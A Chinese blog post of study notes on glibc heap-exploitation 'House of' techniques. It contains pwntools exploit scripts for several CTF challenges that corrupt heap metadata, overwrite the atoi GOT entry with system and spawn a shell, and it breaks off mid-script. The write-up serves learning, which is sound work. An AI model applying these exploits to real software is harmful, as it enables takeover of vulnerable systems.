<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="wiki上的house系列House Of Einherjar思路：主要还是利用unlink,如果程序可以修改prev_size和prev_inuse，那向后合并的时候就可以指向后面任意一个堆了。（overlap） House Of Force思路：利用top_chunk完成任意地址申请，当申请堆时，如果要用top_chunk时，就会比较申请的堆和top_chunk的大小，如果大于的话就会在top">
<meta property="og:type" content="article">
<meta property="og:title" content="wiki上的house系列">
<meta property="og:url" content="http://example.com/2022/01/11/wiki%E4%B8%8A%E7%9A%84house%E7%B3%BB%E5%88%97/index.html">
<meta property="og:site_name" content="study">
<meta property="og:description" content="wiki上的house系列House Of Einherjar思路：主要还是利用unlink,如果程序可以修改prev_size和prev_inuse，那向后合并的时候就可以指向后面任意一个堆了。（overlap） House Of Force思路：利用top_chunk完成任意地址申请，当申请堆时，如果要用top_chunk时，就会比较申请的堆和top_chunk的大小，如果大于的话就会在top">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220111154212459.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220111154245300.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220111160730455.png">
<meta property="article:published_time" content="2022-01-11T08:11:44.000Z">
<meta property="article:modified_time" content="2022-01-11T08:13:30.664Z">
<meta property="article:author" content="rootzhang">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220111154212459.png">

<link rel="canonical" href="http://example.com/2022/01/11/wiki%E4%B8%8A%E7%9A%84house%E7%B3%BB%E5%88%97/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>wiki上的house系列 | study</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">study</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/01/11/wiki%E4%B8%8A%E7%9A%84house%E7%B3%BB%E5%88%97/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="rootzhang">
      <meta itemprop="description" content="我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="study">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          wiki上的house系列
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-01-11 16:11:44 / 修改时间：16:13:30" itemprop="dateCreated datePublished" datetime="2022-01-11T16:11:44+08:00">2022-01-11</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="wiki上的house系列"><a href="#wiki上的house系列" class="headerlink" title="wiki上的house系列"></a>wiki上的house系列</h1><h2 id="House-Of-Einherjar"><a href="#House-Of-Einherjar" class="headerlink" title="House Of Einherjar"></a>House Of Einherjar</h2><p>思路：主要还是利用unlink,如果程序可以修改prev_size和prev_inuse，那向后合并的时候就可以指向后面任意一个堆了。（overlap）</p>
<h2 id="House-Of-Force"><a href="#House-Of-Force" class="headerlink" title="House Of Force"></a>House Of Force</h2><p>思路：利用top_chunk完成任意地址申请，当申请堆时，如果要用top_chunk时，就会比较申请的堆和top_chunk的大小，如果大于的话就会在top_chunk上切割一块下来，假如先修改top_chunk的size为0xffffffffffffffff(比较大小时化作无符号数，因此这个数是最大的)，我们再申请一个负数，那最后top_addr=原来的top_chunk的地址减去申请的数，只要计算好确定的offest，就可以把top_chunk挪移到任意地址，然后再申请出来就好了。</p>
<h5 id="例题：HITCON-training-lab-11"><a href="#例题：HITCON-training-lab-11" class="headerlink" title="例题：HITCON training lab 11"></a>例题：HITCON training lab 11</h5><p>脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh=process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">libc=ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Your choice:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Please enter the length of item name:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Please enter the name of item:&#x27;</span>)</span><br><span class="line">    sh.send(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx,length,content</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Your choice:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Please enter the index of item:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Please enter the length of item name:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(length))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Please enter the new name of the item:&#x27;</span>)</span><br><span class="line">    sh.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">idx</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Your choice:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Please enter the index of item:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Your choice:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#house of force</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;a&#x27;</span>)<span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x500</span>,<span class="string">&#x27;a&#x27;</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;a&#x27;</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">&#x27;a&#x27;</span>)<span class="comment">#3</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="number">0x120</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x100</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x510</span>+<span class="number">0x110</span>+<span class="number">1</span>))</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0x500</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">show()</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;2 : &#x27;</span>)</span><br><span class="line">libc_base=u64(sh.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]-<span class="number">0x10</span>-<span class="number">88</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(libc_base)</span><br><span class="line">edit(<span class="number">3</span>,<span class="number">0x200</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x100</span>+p64(<span class="number">0</span>)+p64(<span class="number">0xffffffffffffffff</span>))</span><br><span class="line">target_addr=libc_base+libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&#x27;a&#x27;</span>)<span class="comment">#4</span></span><br><span class="line">add(<span class="number">0xc0</span>,<span class="string">&#x27;a&#x27;</span>)<span class="comment">#5</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&#x27;a&#x27;</span>)<span class="comment">#6</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&#x27;a&#x27;</span>)<span class="comment">#7</span></span><br><span class="line">free(<span class="number">6</span>)</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">show()</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;2 : &#x27;</span>)</span><br><span class="line">top_addr=u64(sh.recv(<span class="number">4</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))+<span class="number">0x80</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(top_addr)</span><br><span class="line">atoi_addr=elf.got[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line">offset=atoi_addr-top_addr-<span class="number">0x20</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(offset)</span><br><span class="line">add(offset,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">system=libc_base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">add(<span class="number">0x8</span>,p64(system))</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;Your choice:&#x27;</span>)</span><br><span class="line">sh.sendline(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">gdb.attach(sh)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="House-of-Lore"><a href="#House-of-Lore" class="headerlink" title="House of Lore"></a>House of Lore</h2><p>是针对smallbin的攻击，感觉这个挺好用的，以后可以多试试</p>
<p>思路：当需要从smallbin上面脱掉最后一个链时，需要倒数第二个链和bin进行链表处理，会执行以下代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">// 获取 small <span class="built_in">bin</span> 中倒数第二个 chunk 。</span><br><span class="line">bck = victim-&gt;bk;</span><br><span class="line">// 检查 bck-&gt;fd 是不是 victim，防止伪造</span><br><span class="line"><span class="keyword">if</span> (__glibc_unlikely(bck-&gt;fd != victim)) &#123;</span><br><span class="line">    errstr = <span class="string">&quot;malloc(): smallbin double linked list corrupted&quot;</span>;</span><br><span class="line">    goto errout;</span><br><span class="line">&#125;</span><br><span class="line">// 设置 victim 对应的 inuse 位</span><br><span class="line">set_inuse_bit_at_offset(victim, nb);</span><br><span class="line">// 修改 small <span class="built_in">bin</span> 链表，将 small <span class="built_in">bin</span> 的最后一个 chunk 取出来</span><br><span class="line"><span class="built_in">bin</span>-&gt;bk = bck;</span><br><span class="line">bck-&gt;fd = <span class="built_in">bin</span>;</span><br></pre></td></tr></table></figure>

<p>可见，主要控制bk,然后伪造一个chunk通过bck-&gt;fd != victim判断，就可以让一个伪造的chunk进入smallbin</p>
<p>感觉当没开启pie的时候可以完成堆到bss的申请。</p>
<h2 id="House-of-Orange"><a href="#House-of-Orange" class="headerlink" title="House of Orange"></a>House of Orange</h2><p>思路：当申请的堆的大小大于top_chunk时，top_chunk就会被free掉进入bin,当程序没有free功能时可以利用这个特性完成free_chunk，但一般程序会对申请大小做限制，不会超过top_chunk_size，所以要通过溢出修改top_chunk大小，不过也不能随便修改，得让top_chunk_size+top_chunk_addr是0x1000的整数倍才行。</p>
<p>例题：ductf上的pwn1的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#sh=process(&#x27;./main&#x27;)</span></span><br><span class="line">sh=remote(<span class="string">&#x27;47.106.172.144&#x27;</span>,<span class="number">65001</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"><span class="comment">#gdb.attach(sh,&#x27;b main&#x27;)</span></span><br><span class="line">libc=ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc-2.23.so&#x27;</span>)</span><br><span class="line"><span class="comment">#libc=ELF(&#x27;./libc-2.23.so&#x27;)</span></span><br><span class="line">elf =ELF(<span class="string">&#x27;./main&#x27;</span>)</span><br><span class="line">ogg=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">count</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;List count: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(count))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show_item</span>(<span class="params">list_id,item_id</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;List id: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(list_id))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Item id: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(item_id))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">overwrite</span>(<span class="params">list_id,star_id,end_id,number</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;List id: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(list_id))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Star id: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(star_id))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;End id: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(end_id))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;New number: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(number))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">list_id,item_id,number</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;List id: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(list_id))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Item id: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(item_id))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;New number: &#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(number))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">23</span>)</span><br><span class="line">overwrite(<span class="number">0</span>,<span class="number">23</span>,<span class="number">23</span>,<span class="number">0x1311</span>)</span><br><span class="line">add(<span class="number">0x1400</span>)</span><br><span class="line">add(<span class="number">23</span>)</span><br><span class="line">overwrite(<span class="number">0</span>,<span class="number">29</span>,<span class="number">29</span>,<span class="number">0x50000000</span>)</span><br><span class="line">show_item(<span class="number">2</span>,<span class="number">24</span>)</span><br><span class="line">libc.address=<span class="built_in">int</span>(sh.recvuntil(<span class="string">&#x27;\n&#x27;</span>).split(<span class="string">&#x27;: &#x27;</span>)[<span class="number">1</span>])-libc.symbols[<span class="string">&#x27;__malloc_hook&#x27;</span>]-<span class="number">0x10</span>-<span class="number">88</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(libc.address)</span><br><span class="line">system=libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">atoi_got=elf.got[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(atoi_got)</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(system)</span><br><span class="line">overwrite(<span class="number">0</span>,<span class="number">24</span>,<span class="number">24</span>,atoi_got)</span><br><span class="line">overwrite(<span class="number">0</span>,<span class="number">25</span>,<span class="number">25</span>,<span class="number">0x50000000</span>)</span><br><span class="line">edit(<span class="number">1</span>,<span class="number">0</span>,system)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">sh.sendline(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="House-of-Rabbit"><a href="#House-of-Rabbit" class="headerlink" title="House of Rabbit"></a>House of Rabbit</h2><p>以前打比赛遇见过</p>
<p>思路：利用的是fastbin的 malloc consolidate，当申请的堆块的大小大于fasbin的最大值的时候就会触发malloc_consolidat,如果没有使用的话就会把相邻的堆块进行合并，然后放到smallbin上面，合并当然是ublink，无非就是利用prev_size和自身的size来完成合并，只要伪造size就可以完成后面的任意堆合并了。</p>
<p>正常堆块</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20220111154212459.png" alt="image-20220111154212459"></p>
<p>完成伪造后</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20220111154245300.png" alt="image-20220111154245300"></p>
<p>然后再申请一个大堆，就完成chunk2和chunk4的合并了，完成overlap</p>
<p>malloc_consolidat不仅可以用来完成overlap，当能申请的堆很小的时候，还可以通过他把小堆合并放到smallbin上面达到leak出libc地址</p>
<h2 id="House-of-Roman"><a href="#House-of-Roman" class="headerlink" title="House of Roman"></a>House of Roman</h2><p>主要用途，当没有leak函数时通过爆破来完成getshell(感觉要看脸)</p>
<p>前情提要：当一个程序开启pie时虽然基地址是随机的（但随机的很有限），由于是分页管理，所以基地址的最后十二位是0，具体到某一个代码的地址就是基地址加上这个代码的偏移量，如果两个代码的地址不超过0xfff（当然超过也行，别太大就行）,就可以通过修改最后十二位来让这个地址指向另一个代码，但是修改数据是8个字节8个字节修改，第十二位到第十六位不清楚，只能采用爆破的方法来猜正确地址，这个攻击手法就利用这个思路。</p>
<p>思路：unsortedbin上面libc地址和malloc_hook地址很接近，可以通过爆破把这个地址改成malloc_hook，然后把这个堆分配到fasbin上面，申请到mallo_hook附近的空间，然后通过unsortedbin_attack把malloc_hook写上libc的地址，然后再通过爆破的方法把这个地址改成ogg，然后触发malloc_hook(申请或者doublefree)完成getShell,这里帖一个别人梳理的具体步骤</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20220111160730455.png" alt="image-20220111160730455"></p>
<p>例题 new_chall</p>
<p>脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh=process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">ogg=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,idx</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;3. Free&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Enter size of chunk :&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Enter index :&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx,content</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;3. Free&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Enter index of chunk :&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Enter data :&#x27;</span>)</span><br><span class="line">    sh.send(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">idx</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;3. Free&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Enter index :&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwn</span>():</span></span><br><span class="line">    add(<span class="number">0x18</span>,<span class="number">0</span>)</span><br><span class="line">    add(<span class="number">0xa0</span>,<span class="number">1</span>)</span><br><span class="line">    add(<span class="number">0x10</span>,<span class="number">2</span>)</span><br><span class="line">    edit(<span class="number">1</span>,<span 